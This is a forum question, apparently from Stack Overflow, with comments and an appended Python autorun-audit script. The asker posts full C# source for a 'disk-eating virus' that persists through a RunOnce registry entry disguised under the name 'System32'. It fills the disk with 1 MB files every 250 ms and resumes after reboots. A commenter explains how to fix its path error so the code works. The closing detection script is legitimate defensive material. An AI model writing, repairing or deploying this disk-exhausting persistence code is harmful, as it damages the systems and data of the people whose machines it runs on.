I have recently been attempting to make a disk-eating virus to further my educational knowledge, and to further my skills in coding malicious things for whitehat hacking. Recently, however, the piece of code I have been working on is giving me MANY issues.

It runs perfectly when you launch the exe, but when it's run from the registry it gives the error: Access to path denied (C:\Windows\System32\parse.int)

I am confused as to why code is being run in the system32 location!?

__________________ CODE ________________________

using System;
using System.Runtime.InteropServices; // needed to hide console
using System.IO;
using Microsoft.Win32; // Registry

namespace diskeater
{
class Program
{
    // stuff to let me hide it
    [DllImport("kernel32.dll")]
    static extern IntPtr GetConsoleWindow();

    [DllImport("user32.dll")]
    static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

    const int SW_HIDE = 0;

    static void Main(string[] args)
    {
        // Hide
        //var handle = GetConsoleWindow();

       // ShowWindow(handle, SW_HIDE);
        //Hidden

        const string userRoot = "HKEY_CURRENT_USER";
        const string subkey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce";
        const string keyName = userRoot + "\\" + subkey;

        Registry.SetValue(keyName, "System32", "\"" + System.Windows.Forms.Application.ExecutablePath + "\"");

        if (File.Exists("parse.int") == false) {
            var temp = File.Create("parse.int");
            temp.Close();
            var temp2 = new StreamWriter("parse.int");
            temp2.Write("0");
            temp2.Close();

        }

        try {
            string text, count;
            int i;

            try {
                var intreader = new StreamReader("parse.int");
                count = intreader.ReadToEnd();
                intreader.Close();

                text = new string('0', 1048576);

                i = Convert.ToInt32(count);

                while (true) {

                    try {

                        var sw = new StreamWriter("\\win32\\UpdateFile_" + i + ".dat");
                        sw.Write(text);
                        sw.Close();

                        var intcount = new StreamWriter("parse.int");
                        intcount.Write(i);
                        intcount.Close();

                        i++;

                        System.Threading.Thread.Sleep(250);

                    }
                    catch (DirectoryNotFoundException ex) {

                        Directory.CreateDirectory("\\win32");
                        Console.WriteLine(ex);//

                    }

                }

            } catch (FormatException ex) {
                var intcount = new StreamWriter("parse.int");
                intcount.Write("0");
                intcount.Close();

                Console.WriteLine(ex);//
            }

        } catch (FileNotFoundException ex) {
            Console.WriteLine(ex);//
        }

        System.Threading.Thread.Sleep(1000000000); //

    }
}
}
  • It's trying to use System32 because you're not specifying a path for the file, so it's using the current directory. The current directory is apparently System32. If you don't want it to use whatever random directory is current, specify a fully qualified pathname when you work with parse.int. It's not necessary to repeat tag information in your title, or be overly dramatic with the !, or SHOUT parts of the information. We're all capable of reading here. – Ken White Jun 12 '16 at 03:06
  • +Ken White I have a question, so should I do something like `string parse = System.IO.Directory.GetCurrentDirectory() + "//parse.int";` or `string parse = Environment.CurrentDirectory + "//parse.int";` or would both work well?? I don't understand the other things you pointed out, like what do you mean shouts,!,title?) – Sean da Potato Jun 12 '16 at 04:41
  • @KenWhite ^ Sorry I had no clue how to tag you! IDEK If that worked! – Sean da Potato Jun 12 '16 at 15:01
  • CurrentDirectory is System32, and you clearly can't write there. You need to set it to a different directory where you have write access, or use a full path in the filename (C:\Users\SomeUser\Documents\Parse.Int). You can see what I meant if you look at the edits I made to your post in the [revision history](http://stackoverflow.com/posts/37770287/revisions). – Ken White Jun 12 '16 at 16:18
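
From the defender's side, the per-user `RunOnce` entry written by the code in the question (value name `System32`, data set to the program's own quoted path) is something an autorun triage script can flag. The following is an added example, not part of the original post or its comments; the sample `reg query` output, the user name, the executable file name and the list of system-looking value names are constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of `reg query` output for the per-user autorun keys
# (not from a real system; user name and file names are made up).
SAMPLE = r'''
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
    System32    REG_SZ    "C:\Users\alice\Downloads\diskeater.exe"
'''

TRUSTED_ROOTS = [PureWindowsPath(p) for p in
                 (r"C:\Windows", r"C:\Program Files", r"C:\Program Files (x86)")]
# Value names that imitate OS components (illustrative list, an assumption).
SYSTEM_LOOKING = re.compile(r"^(system32|windows|svchost|explorer|winlogon)", re.I)
VALUE_LINE = re.compile(
    r"^\s+(?P<name>.+?)\s{2,}REG_(?:EXPAND_)?SZ\s{2,}(?P<data>.+)$")

def exe_path(data):
    """Extract the executable path from an autorun command line.
    Unquoted paths are cut at the first space, so quote-less paths that
    contain spaces are not handled here."""
    data = data.strip()
    if data.startswith('"'):
        return PureWindowsPath(data[1:].split('"', 1)[0])
    return PureWindowsPath(data.split(" ", 1)[0])

def audit(reg_output):
    """Return (key, value name, exe, reasons) for each suspicious autorun."""
    findings, key = [], None
    for line in reg_output.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if not m or key is None:
            continue
        exe, reasons = exe_path(m["data"]), []
        # PureWindowsPath comparisons are case-insensitive, like NTFS paths.
        if not any(root in exe.parents for root in TRUSTED_ROOTS):
            reasons.append("target outside Windows/Program Files")
            if SYSTEM_LOOKING.match(m["name"]):
                reasons.append("value name imitates a system component")
        if reasons:
            findings.append((key, m["name"], str(exe), reasons))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```
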
